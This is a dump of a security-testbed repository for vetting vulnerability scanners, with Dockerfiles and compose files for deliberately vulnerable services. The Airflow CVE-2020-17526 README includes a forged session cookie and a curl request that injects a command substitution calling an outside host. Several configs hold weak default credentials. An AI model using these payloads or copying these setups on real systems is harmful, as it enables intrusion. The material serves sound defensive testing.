├── .gitignore ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── anything-llm └── CVE-2024-3104 │ ├── Dockerfile │ ├── README.md │ ├── docker-compose.yml │ └── setup.sh ├── apache ├── activemq │ └── CVE-2023-46604 │ │ ├── README.md │ │ ├── activemq-cve-2023-46604.yaml │ │ └── docker-compose.yml ├── airflow │ ├── CVE-2020-17526 │ │ ├── README.md │ │ ├── docker-compose-secure.yml │ │ ├── docker-compose-vulnerable.yml │ │ └── init-user.py │ └── ExposedUI │ │ ├── DockerfileSafe │ │ ├── DockerfileUnSafe │ │ ├── README.md │ │ ├── docker-compose.yml │ │ ├── webserver_config_safe.py │ │ └── webserver_config_unsafe.py ├── apisix │ └── Default_api_token │ │ ├── README.md │ │ ├── config_api_key_change.yml │ │ ├── config_default.yml │ │ ├── docker-compose-non-vulnerable.yml │ │ └── docker-compose.yml ├── flink │ ├── CVE-2020-17519 │ │ └── README.md │ └── apache-flink.yaml ├── hive │ └── weak_credentials │ │ ├── README.md │ │ ├── base.ldif │ │ ├── docker-compose.yml │ │ └── hive-site.xml ├── http │ └── CVE-2021-41773 │ │ └── README.md ├── mod_proxy │ └── CVE-2021-40438 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── apache-mod-proxy-cve-2021-40438.yaml │ │ └── config │ │ └── httpd.conf ├── nifi_api │ └── exposed_ui │ │ ├── README.md │ │ └── apache_nifi_api.yaml ├── ofbiz │ └── cve-2024-32113 │ │ ├── README.md │ │ ├── check_vulnerability.py │ │ ├── make_patched.sh │ │ └── make_vulnerable.sh ├── solr │ ├── CVE-2019-12409 │ │ ├── README.md │ │ └── apache-solr-cve-2019-12409.yaml │ └── CVE-2019-17558 │ │ ├── README.md │ │ └── apache-solr-cve-2019-17558.yaml ├── spark │ ├── CVE-2022-33891 │ │ ├── README.md │ │ ├── fixed-docker-compose.yml │ │ └── vuln-docker-compose.yml │ ├── exposed_api │ │ ├── README.md │ │ └── docker-compose.yml │ └── exposed_ui │ │ ├── README.md │ │ └── docker-compose.yml ├── structs │ ├── CVE-2017-5638 │ │ ├── README.md │ │ └── apache-struts-cve-2017-5638.yaml │ └── CVE-2017-9805 │ │ ├── README.md │ │ └── apache-struts-cve-2017-9805.yaml ├── tomcat │ ├── CVE-2017-12617 │ │ ├── Dockerfile │ │ ├── README.md │ │ └── web.xml │ ├── CVE-2020-1938 │ │ ├── README.md │ │ └── tomcat_ghostcat.yaml │ └── weak_credentials │ │ ├── docker-compose.yml │ │ └── tomcat.md └── zeppelin │ └── exposed_ui │ ├── README.md │ └── zeppelin.yaml ├── archery_range ├── README.md ├── sqli │ ├── README.md │ ├── __init__.py │ ├── app.py │ ├── blueprints │ │ ├── googlesql │ │ │ └── googlesql.py │ │ ├── mysql │ │ │ └── mysql.py │ │ └── postgresql │ │ │ └── postgresql.py │ ├── custom_message_error.py │ ├── database │ │ ├── mysql │ │ │ └── init.sql │ │ └── postgresql │ │ │ └── init.sql │ ├── googlesql_database │ │ ├── csv_files │ │ │ ├── cartitems.csv │ │ │ ├── carts.csv │ │ │ ├── items.csv │ │ │ └── users.csv │ │ └── db_init.py │ ├── requirements.txt │ ├── templates │ │ ├── error.html │ │ ├── index.html │ │ ├── index_database.html │ │ └── items.html │ └── test_case_decorator.py ├── xss │ ├── README.md │ ├── __init__.py │ ├── app.py │ ├── components │ │ ├── __init__.py │ │ ├── constants.py │ │ ├── context.py │ │ ├── processor.py │ │ ├── sink.py │ │ └── source.py │ ├── requirements.txt │ └── templates │ │ ├── index.html │ │ └── source.html └── xxe │ ├── README.md │ ├── app.py │ ├── requirements.txt │ └── templates │ ├── index.html │ └── reflect_xml_post.html ├── argo-cd ├── CVE-2022-29165 │ └── README.md └── weak_credentials │ └── README.md ├── atlassian ├── bitbucket │ └── CVE-2022-36804 │ │ └── README.md └── confluence │ └── CVE-2023-22518 │ └── README.md ├── bentoml ├── Dockerfile ├── README.md ├── docker-compose-safe.yml ├── docker-compose-vulnerable.yml ├── exploit.py └── service.py ├── couchbase └── weak_credentials │ └── couchbase.md ├── drupal ├── CVE-2018-7600 │ ├── README.md │ └── drupal-cve-2018-7600.yaml └── CVE-2019-6340 │ ├── README.md │ └── drupal-cve-2019-6340.yaml ├── ftp └── weak_credentials │ ├── docker-compose.yml │ └── ftp.md ├── geoserver └── cve_2024_36401 │ ├── README.md │ ├── docker-compose-safe.yml │ └── docker-compose-vuln.yml ├── gradio └── CVE-2023-51449 │ ├── README.md │ ├── non-vulnerable.Dockerfile │ ├── test_app.py │ └── vulnerable.Dockerfile ├── grafana └── weak_credentials │ ├── Dockerfile.Grafana │ ├── grafana.md │ └── runAndBuildGraphana.sh ├── h2o └── exposed_ui │ ├── README.md │ ├── challenge │ ├── Dockerfile │ ├── chal.sh │ └── nsjail.cfg │ └── h2o.yaml ├── intel └── neural-compressor │ └── CVE-2024-22476 │ ├── Fixed.Dockerfile │ ├── README.md │ ├── Vulnerable.Dockerfile │ └── task_request.json ├── jenkins ├── CVE-2017-1000353 │ ├── README.md │ └── jenkins.yaml ├── CVE-2024-23897 │ └── README.md └── weak_credentials │ └── jenkins.md ├── joomla ├── CVE-2015-8562 │ ├── README.md │ ├── joomla.yaml │ ├── joomla_img │ │ ├── Dockerfile │ │ └── config │ │ │ ├── configuration.php │ │ │ └── custom_entry.sh │ ├── mysql.yaml │ └── mysql_img │ │ ├── Dockerfile │ │ └── config │ │ └── joomla.sql ├── CVE-2023-23752 │ ├── Readme.md │ ├── docker-compose-safe.yml │ └── docker-compose-vulnerable.yml └── weak_credentials │ ├── docker-compose.yml │ └── joomla.md ├── jupyter └── exposed_ui │ ├── README.md │ └── jupyter.yaml ├── liferay └── liferay-portal │ └── CVE-2020-7961 │ ├── README.md │ └── liferay-portal.yaml ├── magento └── CVE-2024-34102_CosmicSting │ ├── README.md │ ├── apply-patch.sh │ ├── docker-compose-safe.yml │ └── docker-compose-vuln.yml ├── microsoft ├── mssql │ └── weak_credentials │ │ └── mssql.md └── rdp │ └── weak_credentials │ └── rdp.md ├── mlflow ├── CVE-2023-1177 │ ├── README.md │ ├── docker-compose.yml │ └── mlflow-vuln │ │ └── Dockerfile ├── CVE-2023-6014 │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── chal.sh │ │ └── nsjail.cfg ├── CVE-2023-6977 │ └── README.md ├── CVE-2024-2928 │ └── README.md └── weak_credentials │ └── README.md ├── mongodb └── weak_credentials │ └── mongodb.md ├── mysql └── weak_credentials │ └── mysql.md ├── nodejs └── node-red │ ├── CVE-2021-3223 │ ├── Dockerfile │ ├── README.md │ └── node_red_cve_2021_3223.yaml │ └── exposedui │ └── README.md ├── oracle └── weblogic │ └── CVE-2020-14883 │ ├── Dockerfile │ ├── README.md │ └── weblogic_cve_2020_14883.yaml ├── others └── http_auth │ └── weak_credentials │ └── http_auth.md ├── papercut └── ng_mf │ └── CVE-2023-27350 │ ├── Dockerfile │ ├── Readme.md │ ├── assets │ ├── cupsd.conf │ ├── image_setup.py │ ├── server.properties │ ├── setup.sh │ └── startup.sh │ ├── docker-bake.hcl │ └── local_builder.sh ├── php ├── arbitrary_file_write_php │ ├── Dockerfile │ ├── README.md │ ├── index.php │ └── startup.sh ├── phpunit │ └── CVE-2017-9841 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-entrypoint.sh │ │ └── phpunit-cve-2017-9841.yaml └── rce_and_arbitrary_file_read_php │ ├── Dockerfile │ ├── README.md │ ├── index.php │ └── startup.sh ├── postgres └── weak_credentials │ └── postgres.md ├── rabbitmq └── weak_credentials │ ├── Dockerfile │ └── README.md ├── ray └── CVE-2023-48022 │ ├── README.md │ └── ray.yaml ├── redis └── CVE-2022-0543 │ └── README.md ├── roxy-wi └── cve_2022_31137 │ ├── README.md │ ├── docker-compose-safe.yml │ └── docker-compose.yml ├── rstudio └── weak_credentials │ ├── Dockerfile │ └── README.md ├── selenium └── selenium_grid_rce_via_exposed_server │ └── selenium_grid_chrome.md ├── slurm └── exposed_rest_api │ ├── README.md │ ├── docker-compose.yml │ ├── rest_api_test.json │ └── slurm │ ├── Dockerfile │ ├── cgroup.conf │ ├── entrypoint.sh │ ├── jwt_hs256.key │ └── slurm.conf ├── smb └── weak_credentials │ └── smb.md ├── spring └── spring_cloud │ └── spring_cloud_function │ └── CVE-2022-22963 │ ├── README.md │ └── spring-cloud-function.yaml ├── ssh └── weak_credentials │ ├── Dockerfile │ └── ssh.md ├── strapi └── CVE-2023-22893 │ ├── README.md │ ├── non-vulnerable.Dockerfile │ └── vulnerable.Dockerfile ├── telnet └── weak_credentials │ └── telnet.md ├── triton └── triton-inference-server │ ├── ASimpleModel │ ├── 1 │ │ └── model.py │ └── config.pbtxt │ └── README.md ├── vbulletin └── CVE-2019-16759 │ ├── README.md │ └── vbulletin_cve_2019_16759.yaml ├── vnc └── weak_credentials │ └── vnc.md ├── wordpress ├── unfinished_installation │ ├── README.md │ ├── mysql.yaml │ └── wordpress.yaml └── weak_credentials │ ├── docker-compose.yml │ └── wordpress.md ├── xrdp └── weak_credentials │ └── README.md ├── xwiki └── CVE-2024-21650 │ ├── README.md │ ├── env-true-negative │ └── env-true-positive └── zenml └── Exposed_UI ├── DockerfileUnSafe ├── README.md └── docker-compose.yml /.gitignore: -------------------------------------------------------------------------------- 1 | # Gradle 2 | build 3 | gradle.properties 4 | .gradle 5 | local.properties 6 | out 7 | 8 | # IntelliJ IDEA 9 | .idea 10 | *.iml 11 | *.ipr 12 | *.iws 13 | classes 14 | 15 | # Eclipse 16 | .classpath 17 | .factorypath 18 | .project 19 | .settings 20 | bin 21 | eclipsebin 22 | 23 | # OS X 24 | .DS_Store 25 | 26 | # Emacs 27 | *~ 28 | \#*\# 29 | 30 | # VSCode history 31 | .history 32 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to Contribute 2 | 3 | We'd love to accept your patches and contributions to this project. There are 4 | just a few small guidelines you need to follow. 5 | 6 | ## Contributor License Agreement 7 | 8 | Contributions to this project must be accompanied by a Contributor License 9 | Agreement. You (or your employer) retain the copyright to your contribution; 10 | this simply gives us permission to use and redistribute your contributions as 11 | part of the project. Head over to to see 12 | your current agreements on file or to sign a new one. 13 | 14 | You generally only need to submit a CLA once, so if you've already submitted one 15 | (even if it was for a different project), you probably don't need to do it 16 | again. 17 | 18 | ## Code reviews 19 | 20 | All submissions, including submissions by project members, require review. We 21 | use GitHub pull requests for this purpose. Consult 22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more 23 | information on using pull requests. 24 | 25 | ## Community Guidelines 26 | 27 | This project follows 28 | [Google's Open Source Community Guidelines](https://opensource.google.com/conduct/). 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Testbeds for Security Scanner 2 | 3 | This project aims to provide a central repository for testbeds contents usable 4 | to assert the quality and functionality of security scanners. This includes 5 | 0-day and 1-day scanning capabilities. 6 | 7 | ## Testbed contents 8 | 9 | The tesbed contents are logically grouped into different sub projects. E.g., 10 | the `archery_range` is the 0-day testbed hosting different applications that 11 | help to assert functionality and quality of a 0-day black box scanner. Each 12 | subfolder provides detailed instructions on the type of vulnerabilities it hosts 13 | and provides instructions for setting up and running the testbed containers. 14 | 15 | For now, we merely provide the testbed contents source, but we might, in the 16 | future, provided a uniform build setup for all of the testbed applications. 17 | 18 | ## Contributing 19 | 20 | Read how to [contribute](CONTRIBUTING.md). 21 | 22 | ## Source Code Headers 23 | 24 | Every file containing source code must include copyright and license 25 | information. This includes any JS/CSS files that you might be serving out to 26 | browsers. (This is to help well-intentioned people avoid accidental copying that 27 | doesn't comply with the license.) 28 | 29 | Apache header: 30 | 31 | ``` 32 | Copyright 2022 Google LLC 33 | 34 | Licensed under the Apache License, Version 2.0 (the "License"); 35 | you may not use this file except in compliance with the License. 36 | You may obtain a copy of the License at 37 | 38 | https://www.apache.org/licenses/LICENSE-2.0 39 | 40 | Unless required by applicable law or agreed to in writing, software 41 | distributed under the License is distributed on an "AS IS" BASIS, 42 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 43 | See the License for the specific language governing permissions and 44 | limitations under the License. 45 | ``` 46 | 47 | ## Disclaimer 48 | 49 | Security Testbeds is not an officially supported Google product. 50 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/Dockerfile: -------------------------------------------------------------------------------- 1 | # Setup base image 2 | FROM ubuntu:jammy-20230522 AS base 3 | 4 | 5 | ############################################# 6 | FROM base AS build-amd64 7 | RUN echo "Preparing build of AnythingLLM image for non-ARM architecture" 8 | 9 | RUN DEBIAN_FRONTEND=noninteractive apt-get update && \ 10 | DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \ 11 | curl gnupg libgfortran5 libgbm1 tzdata netcat \ 12 | libasound2 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 libexpat1 libfontconfig1 \ 13 | libgcc1 libglib2.0-0 libgtk-3-0 libnspr4 libpango-1.0-0 libx11-6 libx11-xcb1 libxcb1 \ 14 | libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 \ 15 | libxss1 libxtst6 ca-certificates fonts-liberation libappindicator1 libnss3 lsb-release \ 16 | xdg-utils git build-essential ffmpeg && \ 17 | mkdir -p /etc/apt/keyrings && \ 18 | curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg && \ 19 | echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_18.x nodistro main" | tee /etc/apt/sources.list.d/nodesource.list && \ 20 | apt-get update && \ 21 | apt-get install -yq --no-install-recommends nodejs && \ 22 | curl -LO https://github.com/yarnpkg/yarn/releases/download/v1.22.19/yarn_1.22.19_all.deb \ 23 | && dpkg -i yarn_1.22.19_all.deb \ 24 | && rm yarn_1.22.19_all.deb 25 | 26 | # Create a group and user with specific UID and GID 27 | RUN groupadd -g 1000 anythingllm && \ 28 | useradd -u 1000 -m -d /app -s /bin/bash -g anythingllm anythingllm && \ 29 | mkdir -p /app/frontend/ /app/server/ /app/collector/ && chown -R anythingllm:anythingllm /app 30 | 31 | # Copy docker helper scripts 32 | COPY ./docker/docker-entrypoint.sh /usr/local/bin/ 33 | COPY ./docker/docker-healthcheck.sh /usr/local/bin/ 34 | COPY --chown=anythingllm:anythingllm ./docker/.env.example /app/server/.env 35 | 36 | # Ensure the scripts are executable 37 | RUN chmod +x /usr/local/bin/docker-entrypoint.sh && \ 38 | chmod +x /usr/local/bin/docker-healthcheck.sh 39 | 40 | ############################################# 41 | # COMMON BUILD FLOW FOR ALL ARCHS 42 | ############################################# 43 | FROM build-amd64 AS build 44 | RUN echo "Running common build flow of AnythingLLM image for all architectures" 45 | 46 | USER anythingllm 47 | WORKDIR /app 48 | 49 | # Install frontend dependencies 50 | FROM build as frontend-deps 51 | 52 | COPY ./frontend/package.json ./frontend/yarn.lock ./frontend/ 53 | RUN cd ./frontend/ && yarn install --network-timeout 100000 && yarn cache clean 54 | 55 | # Install server dependencies 56 | FROM build as server-deps 57 | COPY ./server/package.json ./server/yarn.lock ./server/ 58 | RUN cd ./server/ && yarn install --production --network-timeout 100000 && yarn cache clean 59 | 60 | # Compile Llama.cpp bindings for node-llama-cpp for this operating system. 61 | USER root 62 | RUN cd ./server && npx --no node-llama-cpp download 63 | USER anythingllm 64 | 65 | # Build the frontend 66 | FROM frontend-deps as build-stage 67 | COPY ./frontend/ ./frontend/ 68 | RUN cd ./frontend/ && yarn build && yarn cache clean 69 | 70 | # Setup the server 71 | FROM server-deps as production-stage 72 | COPY --chown=anythingllm:anythingllm ./server/ ./server/ 73 | 74 | # Copy built static frontend files to the server public directory 75 | COPY --from=build-stage /app/frontend/dist ./server/public 76 | 77 | # Copy the collector 78 | COPY --chown=anythingllm:anythingllm ./collector/ ./collector/ 79 | 80 | # Install collector dependencies 81 | ENV PUPPETEER_DOWNLOAD_BASE_URL=https://storage.googleapis.com/chrome-for-testing-public 82 | RUN cd /app/collector && yarn install --production --network-timeout 100000 && yarn cache clean 83 | 84 | # Migrate and Run Prisma against known schema 85 | RUN cd ./server && npx prisma generate --schema=./prisma/schema.prisma 86 | RUN cd ./server && npx prisma migrate deploy --schema=./prisma/schema.prisma 87 | 88 | # Setup the environment 89 | ENV NODE_ENV=production 90 | ENV ANYTHING_LLM_RUNTIME=docker 91 | 92 | # Expose the server port 93 | EXPOSE 3001 94 | 95 | # Setup the healthcheck 96 | HEALTHCHECK --interval=1m --timeout=10s --start-period=1m \ 97 | CMD /bin/bash /usr/local/bin/docker-healthcheck.sh || exit 1 98 | 99 | # Run the server 100 | ENTRYPOINT ["/bin/bash", "/usr/local/bin/docker-entrypoint.sh"] 101 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | 3 | services: 4 | anything-llm: 5 | container_name: anything-llm 6 | image: anything-llm:latest 7 | build: 8 | context: ../. 9 | dockerfile: ./docker/Dockerfile 10 | args: 11 | ARG_UID: ${UID:-1000} 12 | ARG_GID: ${GID:-1000} 13 | cap_add: 14 | - SYS_ADMIN 15 | volumes: 16 | - "./.env:/app/server/.env" 17 | - "../server/storage:/app/server/storage" 18 | - "../collector/hotdir/:/app/collector/hotdir" 19 | - "../collector/outputs/:/app/collector/outputs" 20 | user: "${UID:-1000}:${GID:-1000}" 21 | env_file: 22 | - .env 23 | network_mode: "host" 24 | extra_hosts: 25 | - "host.docker.internal:host-gateway" 26 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | git clone https://github.com/Mintplex-Labs/anything-llm.git 4 | cd anything-llm 5 | git reset --hard fde905aac 6 | touch server/storage/anythingllm.db 7 | cd docker/ 8 | cp .env.example .env 9 | cp ../../Dockerfile ./Dockerfile 10 | cp ../../docker-compose.yml ./docker-compose.yml 11 | docker-compose up -d --build 12 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/README.md: -------------------------------------------------------------------------------- 1 | # Apache ActiveMQ CVE-2023-46604 2 | 3 | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. 4 | 5 | ## Docker-compose 6 | You can deploy the vulnerable version of Apache ActiveMQ by running in docker-compose: 7 | ```sh 8 | docker-compose -f docker-compose.yml up 9 | ``` 10 | It takes several minutes to wait for the service to be accessed normally, and the exposed web service port is [8161],tcp port is [61616]. but the vulnerability is only exposed on port 61616. 11 | 12 | ## Kubernetes 13 | Or you can deploy the vulnerable version of Apache ActiveMQ by running in kubernetes: 14 | ```sh 15 | kubectl apply -f apache-activemq-cve-2023-46604.yaml 16 | ``` 17 | The Kubernetes deployment will create a service named `apache-activemq-cve-2023-46604` listening on port `61616`. 18 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/activemq-cve-2023-46604.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache ActiveMQ service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-activemq-cve-2023-46604 6 | labels: 7 | app: apache-activemq-cve-2023-46604 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | port: 61616 12 | targetPort: 61616 13 | selector: 14 | app: apache-activemq-cve-2023-46604 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache ActiveMQ service. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: apache-activemq-cve-2023-46604 22 | labels: 23 | app: apache-activemq-cve-2023-46604 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-activemq-cve-2023-46604 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-activemq-cve-2023-46604 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-activemq-cve-2023-46604 39 | image: symptoma/activemq:5.17.3 40 | ports: 41 | - containerPort: 61616 42 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | activemq: 4 | image: symptoma/activemq:5.17.3 5 | ports: 6 | - "61616:61616" 7 | - "8161:8161" 8 | - "5005:5005" 9 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/README.md: -------------------------------------------------------------------------------- 1 | # requirements setup 2 | spin up an `Ubuntu 22.04` fresh instance and log in as root. 3 | ```bash 4 | apt update 5 | apt install dos2unix 6 | wget -q -O - "https://get.docker.com/" | dos2unix | bash 7 | # clone the repo 8 | # cd security-testbeds/apache/airflow/CVE-2020-17526 9 | ``` 10 | # setup Vulnerable instance 11 | ## Initialize the database 12 | ```bash 13 | docker compose -f docker-compose-vulnerable.yml run airflow-init 14 | ``` 15 | ## Start service 16 | ```bash 17 | docker compose -f docker-compose-vulnerable.yml up -d 18 | ``` 19 | ## test the exploit 20 | ### simple test 21 | ```bash 22 | curl 'http://127.0.0.1:8080/admin/' -H 'Cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.ZgdmZA.GDwzAupY1c9AXYDbLRvjSiZCVw0' 23 | ``` 24 | in a successfull exploitation, you should not be redirected to login page. on the other hand, you should receive the list of DAGs. 25 | ### test with OOB 26 | ```bash 27 | # first grab a CSRF token and the new session cookie 28 | curl 'http://127.0.0.1:8080/admin/' -v -H 'Cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.ZgdmZA.GDwzAupY1c9AXYDbLRvjSiZCVw0' | grep 'var CSRF = "' 29 | 30 | # update session cookie and X-CSRFToken values from previous request 31 | # enable the vulnerable DAG 32 | curl 'http://127.0.0.1:8080/admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag' -X 'POST' -H 'Cookie: session=REPLACE_HERE' -H 'Referer: http://127.0.0.1:8080/admin/airflow/tree?dag_id=example_trigger_target_dag' -H 'X-CSRFToken: REPLACE_HERE' 33 | 34 | # update session cookie and X-CSRFToken values from previous request 35 | # send the payload to vulnerable DAG, replace HOSTNAME and PORT to yours. 36 | curl 'http://127.0.0.1:8080/admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag' -X POST -H 'Cookie: session=REPLACE_HERE' --data-raw 'csrf_token=REPLACE_HERE&dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag&conf=%7B%22message%22%3A%22%60curl+HOSTNAME%3APORT%60%22%7D' 37 | ``` 38 | # setup secure instance 39 | ## Initialize the database 40 | ```bash 41 | docker compose -f docker-compose-secure.yml run airflow-init 42 | ``` 43 | ## Start service 44 | ```bash 45 | docker compose -f docker-compose-secure.yml up -d 46 | ``` 47 | 48 | Ref: 49 | https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-17526 50 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/docker-compose-secure.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | x-airflow-common: 3 | &airflow-common 4 | image: vulhub/airflow:1.10.14 5 | environment: 6 | &airflow-common-env 7 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor 8 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow 9 | AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow 10 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0 11 | AIRFLOW__CORE__FERNET_KEY: '' 12 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true' 13 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true' 14 | AIRFLOW__WEBSERVER__AUTHENTICATE: 'true' 15 | AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth' 16 | user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}" 17 | depends_on: 18 | redis: 19 | condition: service_healthy 20 | postgres: 21 | condition: service_healthy 22 | 23 | services: 24 | postgres: 25 | image: postgres:13-alpine 26 | environment: 27 | POSTGRES_USER: airflow 28 | POSTGRES_PASSWORD: airflow 29 | POSTGRES_DB: airflow 30 | healthcheck: 31 | test: ["CMD", "pg_isready", "-U", "airflow"] 32 | interval: 5s 33 | retries: 5 34 | 35 | redis: 36 | image: redis:5-alpine 37 | healthcheck: 38 | test: ["CMD", "redis-cli", "ping"] 39 | interval: 5s 40 | timeout: 30s 41 | retries: 50 42 | 43 | airflow-webserver: 44 | <<: *airflow-common 45 | command: webserver 46 | ports: 47 | - 8080:8080 48 | healthcheck: 49 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"] 50 | interval: 10s 51 | timeout: 10s 52 | retries: 5 53 | 54 | airflow-scheduler: 55 | <<: *airflow-common 56 | command: scheduler 57 | healthcheck: 58 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"'] 59 | interval: 10s 60 | timeout: 10s 61 | retries: 5 62 | 63 | airflow-worker: 64 | <<: *airflow-common 65 | command: worker 66 | healthcheck: 67 | test: 68 | - "CMD-SHELL" 69 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"' 70 | interval: 10s 71 | timeout: 10s 72 | retries: 5 73 | 74 | airflow-init: 75 | <<: *airflow-common 76 | entrypoint: python /opt/airflow/init-user.py 77 | volumes: 78 | - ./init-user.py:/opt/airflow/init-user.py 79 | environment: 80 | <<: *airflow-common-env 81 | _AIRFLOW_DB_UPGRADE: 'true' 82 | 83 | flower: 84 | <<: *airflow-common 85 | command: flower 86 | ports: 87 | - 5555:5555 88 | healthcheck: 89 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"] 90 | interval: 10s 91 | timeout: 10s 92 | retries: 5 93 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | x-airflow-common: 3 | &airflow-common 4 | image: vulhub/airflow:1.10.10 5 | environment: 6 | &airflow-common-env 7 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor 8 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow 9 | AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow 10 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0 11 | AIRFLOW__CORE__FERNET_KEY: '' 12 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true' 13 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true' 14 | AIRFLOW__WEBSERVER__AUTHENTICATE: 'true' 15 | AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth' 16 | user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}" 17 | depends_on: 18 | redis: 19 | condition: service_healthy 20 | postgres: 21 | condition: service_healthy 22 | 23 | services: 24 | postgres: 25 | image: postgres:13-alpine 26 | environment: 27 | POSTGRES_USER: airflow 28 | POSTGRES_PASSWORD: airflow 29 | POSTGRES_DB: airflow 30 | healthcheck: 31 | test: ["CMD", "pg_isready", "-U", "airflow"] 32 | interval: 5s 33 | retries: 5 34 | 35 | redis: 36 | image: redis:5-alpine 37 | healthcheck: 38 | test: ["CMD", "redis-cli", "ping"] 39 | interval: 5s 40 | timeout: 30s 41 | retries: 50 42 | 43 | airflow-webserver: 44 | <<: *airflow-common 45 | command: webserver 46 | ports: 47 | - 8080:8080 48 | healthcheck: 49 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"] 50 | interval: 10s 51 | timeout: 10s 52 | retries: 5 53 | 54 | airflow-scheduler: 55 | <<: *airflow-common 56 | command: scheduler 57 | healthcheck: 58 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"'] 59 | interval: 10s 60 | timeout: 10s 61 | retries: 5 62 | 63 | airflow-worker: 64 | <<: *airflow-common 65 | command: worker 66 | healthcheck: 67 | test: 68 | - "CMD-SHELL" 69 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"' 70 | interval: 10s 71 | timeout: 10s 72 | retries: 5 73 | 74 | airflow-init: 75 | <<: *airflow-common 76 | entrypoint: python /opt/airflow/init-user.py 77 | volumes: 78 | - ./init-user.py:/opt/airflow/init-user.py 79 | environment: 80 | <<: *airflow-common-env 81 | _AIRFLOW_DB_UPGRADE: 'true' 82 | 83 | flower: 84 | <<: *airflow-common 85 | command: flower 86 | ports: 87 | - 5555:5555 88 | healthcheck: 89 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"] 90 | interval: 10s 91 | timeout: 10s 92 | retries: 5 93 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/init-user.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | from airflow import models, settings 4 | from airflow.contrib.auth.backends.password_auth import PasswordUser 5 | 6 | os.system('/entrypoint initdb') 7 | 8 | user = PasswordUser(models.User()) 9 | user.username = 'vulhub' 10 | user.email = 'vulhub@example.com' 11 | user.password = 'vulhub' 12 | user.superuser = True 13 